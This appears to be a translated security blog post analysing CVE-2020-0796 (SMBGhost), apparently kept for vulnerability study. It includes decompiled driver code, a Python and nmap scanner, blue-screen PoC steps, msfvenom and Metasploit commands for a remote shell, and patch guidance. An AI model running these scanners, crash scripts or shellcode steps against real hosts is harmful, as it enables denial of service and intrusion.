0x00 Preface
I have been busy for some time recently. The very popular CVE-2020-0796 (Eternal Black) has not come and reproduced. Today, taking advantage of the fast internet, download the vulnerable system as soon as possible, and prepare detection payloads, blue screen payloads, and mentions. The right payload and the command execution payload reproduce a wave. In comparison, the payload is only different to achieve different functions. The analysis is below.
0x01 vulnerability description
The vulnerability bulletin shows that when processing compressed messages in the SMB 3.1.1 protocol, the data in it is not checked for security, and direct use will cause memory corruption vulnerabilities, which may be used by attackers to remotely execute arbitrary code. Attackers can use this vulnerability to realize remote code execution without permission, and the target system attacked by hackers can be invaded just by booting up and going online.
0x02 vulnerability hazard level
high
0x03 Affected version
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
Test machine ip: 192.168.1.159
0x04 vulnerability principle
The vulnerability occurred in srv2.sys. Because SMB did not correctly process the compressed data packet, when decompressing the data packet, it did not check whether the length was legal or not when decompressing the data packet using the length passed by the client. Eventually, it caused an integer overflow.
Data compression is supported in SMB v3. If the ProtocolId in the SMB Header is 0x424D53FC, which is 0xFC,'S','M','B', then the data is compressed, and then smb will call the compression and decompression processing functions.
First, SMB will call the srv2!Srv2ReceiveHandler function to receive the smb data packet, and set the corresponding processing function according to ProtocoIId.
__int64 __fastcall Srv2ReceiveHandler(__int64 a1, void *Src, __int64 a3, unsigned int a4, unsigned int *a5, char *Srca, struct _SLIST_ENTRY *a7, _QWORD *a8)
{
...
//
// 这里判断头部ProtocolId
//
if ( **((_DWORD **)&v20[15].Next[1].Next + 1) == 'BMS\xFC' )
{
if ( KeGetCurrentIrql() > 1u )
{
v20[14].Next = (_SLIST_ENTRY *)v11;
v20[2].Next = (_SLIST_ENTRY *)Srv2DecompressMessageAsync;
v43 = HIDWORD(v20->Next) == 5;
*((_DWORD *)&v20[3].Next + 2) = 0;
if ( v43 )
{
LOBYTE(v71) = 1;
LOBYTE(v35) = 1;
SRV2_PERF_ENTER_EX(&v20[32].Next + 1, v35, 307i64, "Srv2PostToThreadPool", (_DWORD)v71);
}
v44 = *((_QWORD *)&v20[3].Next[8].Next + 1);
v45 = *(_QWORD *)(v44 + 8i64 * KeGetCurrentNodeNumber() + 8);
if ( !ExpInterlockedPushEntrySList((PSLIST_HEADER)(v45 + 16), v20 + 1) && *(_WORD *)(v45 + 66) )
RfspThreadPoolNodeWakeIdleWorker(v45);
goto LABEL_168;
}
}
}
The code that generates the integer overflow vulnerability is as follows:
__int64 __fastcall Srv2DecompressData(__int64 pData)
{
__int64 v2; // rax
COMPRESSION_TRANSFORM_HEADER Header; // xmm0 MAPDST
__m128i v4; // xmm0
unsigned int CompressionAlgorithm; // ebp
__int64 UnComparessBuffer; // rax MAPDST
int v9; // eax
int v11; // [rsp+60h] [rbp+8h]
v11 = 0;
v2 = *(_QWORD *)(pData + 0xF0);
if ( *(_DWORD *)(v2 + 0x24) < 0x10u ) // 这里判断数据包长度的最小值
return 0xC000090Bi64;
Header = *(COMPRESSION_TRANSFORM_HEADER *)*(_QWORD *)(v2 + 0x18);// [v2+0x18]中为客户端传进来的Buffer
// [v2+0x24]为数据包长度
v4 = _mm_srli_si128((__m128i)Header, 8);
CompressionAlgorithm = *(_DWORD *)(*(_QWORD *)(*(_QWORD *)(pData + 0x50) + 0x1F0i64) + 0x8Ci64);
if ( CompressionAlgorithm != v4.m128i_u16[0] )
return 0xC00000BBi64;
UnCompressBuffer = SrvNetAllocateBuffer((unsigned int)(Header.OriginalCompressedSegmentSize + v4.m128i_i32[1]), 0i64);// OriginalCompressedSegmentSize + CompressedSegmentSize,这里没有检查相加的值,导致整数溢出,分配一个较小的UnCompressBuffer
if ( !UnComparessBuffer )
return 0xC000009Ai64;
if ( (int)SmbCompressionDecompress(
CompressionAlgorithm, // CompressionAlgorithm
*(_QWORD *)(*(_QWORD *)(pData + 0xF0) + 0x18i64) + (unsigned int)Header.Length + 0x10i64,// CompressedBuffer
(unsigned int)(*(_DWORD *)(*(_QWORD *)(pData + 0xF0) + 0x24i64) - Header.Length - 0x10),// CompressedBufferSize
(unsigned int)Header.Length + *(_QWORD *)(UnComparessBuffer + 0x18),// UncompressedBuffer,会传入SmbCompressionDecompress函数进行Decompress处理。
Header.OriginalCompressedSegmentSize,
&v11) < 0
|| (v9 = v11, v11 != Header.OriginalCompressedSegmentSize) )
{
SrvNetFreeBuffer(UnComparessBuffer);
return 0xC000090Bi64;
}
if ( Header.Length )
{
memmove(
*(void **)(UnComparessBuffer + 24),
(const void *)(*(_QWORD *)(*(_QWORD *)(pData + 240) + 24i64) + 16i64),
(unsigned int)Header.Length);
v9 = v11;
}
*(_DWORD *)(UnComparessBuffer + 36) = Header.Length + v9;
Srv2ReplaceReceiveBuffer(pData, UnComparessBuffer);
return 0i64;
}
0x05 vulnerability detection
There have been many verification scripts, and the overall idea is to verify whether a specific location in the return packet contains the two keywords of hexadecimal \x11\x03 or \x02\x00. The communication response packet in the vulnerable SMB version is as follows:
Python3 version of POC
import socket
import struct
import sys
from netaddr import IPNetwork
pkt = b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
subnet = sys.argv[1]
for ip in IPNetwork(subnet):
sock = socket.socket(socket.AF_INET)
sock.settimeout(3)
try:
sock.connect(( str(ip), 445 ))
except:
sock.close()
continue
sock.send(pkt)
nb, = struct.unpack(">I", sock.recv(4))
res = sock.recv(nb)
if res[68:70] != b"\x11\x03" or res[70:72] != b"\x02\x00":
print(f"{ip} Not vulnerable.")
else:
print(f"{ip} Vulnerable")
You can also use the nmap script to verify, relying on the powerful framework of nmap, it is more convenient.
local smb = require "smb"
local stdnse = require "stdnse"
local nmap = require "nmap"
description = [[
smb-protocols script modified to apply check for CVE-2020-0796 by psc4re.
Attempts to list the supported protocols and dialects of a SMB server.
Packet check based on https://github.com/ollypwn/SMBGhost/
The script attempts to initiate a connection using the dialects:
* NT LM 0.12 (SMBv1)
* 2.02 (SMBv2)
* 2.10 (SMBv2)
* 3.00 (SMBv3)
* 3.02 (SMBv3)
* 3.11 (SMBv3)
Additionally if SMBv1 is found enabled, it will mark it as insecure. This
script is the successor to the (removed) smbv2-enabled script.
]]
---
-- @usage nmap -p445 --script smb-protocols <target>
-- @usage nmap -p139 --script smb-protocols <target>
--
-- @output
-- | smb-protocols:
-- | dialects:
-- | NT LM 0.12 (SMBv1) [dangerous, but default]
-- | 2.02
-- | 2.10
-- | 3.00
-- | 3.02
-- |_ 3.11 (SMBv3.11) compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost
--
-- @xmloutput
-- <table key="dialects">
-- <elem>NT LM 0.12 (SMBv1) [dangerous, but default]</elem>
-- <elem>2.02</elem>
-- <elem>2.10</elem>
-- <elem>3.00</elem>
-- <elem>3.02</elem>
-- <elem>3.11 (SMBv3.11) [Potentially Vulnerable to CVE-2020-0796 Coronablue]</elem>
-- </table>
---
author = "Paulino Calderon (Modified by Psc4re)"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"safe", "discovery"}
hostrule = function(host)
return smb.get_port(host) ~= nil
end
action = function(host,port)
local status, supported_dialects, overrides
local output = stdnse.output_table()
overrides = {}
status, supported_dialects = smb.list_dialects(host, overrides)
if status then
for i, v in pairs(supported_dialects) do -- Mark SMBv1 as insecure
if v == "NT LM 0.12" then
supported_dialects[i] = v .. " (SMBv1) [dangerous, but default]"
end
if v == "3.11" then
local msg
local response
local compresionalg
local comp
msg = '\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
local socket = nmap.new_socket()
socket:set_timeout(3000)
socket:connect(host.ip,445)
socket:send(msg)
response,data = socket:receive()
compressionalg= string.sub(data,-2)
if compressionalg == "\x01\x00" then
comp = "LZNT1 compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost"
elseif compressionalg == "\x02\x00" then
comp ="LZ77 compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost"
elseif compressionalg == "\x00\x00" then
comp ="No Compression Not Vulnerable"
elseif compressionalg == "\x03\x00" then
comp="LZ77+Huffman compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost"
end
supported_dialects[i] = v .." " .. comp
end
end
output.dialects = supported_dialects
end
if #output.dialects>0 then
return output
else
stdnse.debug1("No dialects were accepted")
if nmap.verbosity()>1 then
return "No dialects accepted. Something may be blocking the responses"
end
end
end
You can also use Qi'anxin's POC detection script for testing:
0x06 Local privilege escalation POC
Successfully elevated authority to nt authority\system
0x07 blue screen test
Save time here and collect a few pictures. The git download address is still for everyone, please do not use it for destruction, offenders bear the consequences.
First, git downloads the poc for the blue screen test and
installs the dependencies
Attack machine Kali ip: 192.168.1.160
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 setup.py install
Blue screen attacks using scripts
python3 gistfile1.py 192.168.1.159
0x08 remote command execution shell
First use systeminfo to look at the patch (KB4551762)
to generate the python version of the rebound shellcode under kali
msfvenom -p windows/x64/meterpreter/bind_tcp lport=2333 -f py -o exp.py
View the generated shellcode
cat exp.py
Replace the variable buf in the generated exp.py code with the variable USER_PAYLOAD, and then paste all the code to cover the following code:
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 2333
set rhost 192.168.1.106 (目标ip)
run
0x09 bug fix
1. Update, complete the patch installation.
Operation steps: Settings -> Update and Security -> Windows Update, click "Check for Updates".
2. Microsoft gave a temporary countermeasure:
Run regedit.exe, open the registry editor, create a DWORD named DisableCompression in HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters, the value is 1, prohibit SMB compression Features.
3. Block SMB communication port 445. 4. Patch link https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4551762
Reference connection
- https://www.cnblogs.com/A66666/p/29635a243378b49ccb485c7a280df989.html
- https://github.com/danigargu/CVE-2020-0796
- http://dl.qianxin.com/skylar6
- https://github.com/ollypwn/SMBGhost
- https://github.com/chompie1337/SMBGhost_RCE_PoC
- https://github.com/danigargu/CVE-2020-0796
- https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/
Please indicate: Adminxe's Blog » CVE-2020-0796 SMB remote code execution vulnerability (analysis, verification and reinforcement)